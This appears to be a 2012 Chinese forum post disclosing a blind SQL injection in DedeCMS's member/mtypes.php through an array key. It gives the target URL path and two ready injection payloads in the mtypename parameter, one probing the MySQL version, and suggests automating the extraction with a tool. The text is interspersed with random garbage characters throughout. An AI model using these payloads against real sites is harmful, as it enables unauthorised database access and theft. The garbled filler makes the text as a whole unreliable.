需要magic_quotes_gpc = Off,所以说是鸡肋啊.
8 B3 E% m& J& c
7 A2 q% }8 n4 |
- w! W# e& [! P: a5 h. y; z( D5 U发生在数组key里的注射漏洞,有点意思.4 P, d" r) u3 W% M' q+ B" R. G
8 G4 i1 j7 @" F2 x2 v2 c3 S这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下( S3 j+ b2 U' \8 k4 f
' p) G, L& t) `+ \
http://www.xxx.com /dede/member/mtypes.php?dopost=save+ C/ n$ z+ b) y, x0 j
2 j1 \" A0 W3 wexploit:! e! K/ ^+ `# _* S' n4 R
mtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r) P% a4 \3 o H5 U, M3 @/ n
mtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r- Q2 z% L5 n7 Z( Q# c' L5 H% M
|
发表于 2012-12-20 08:08:09
收藏
支持
反对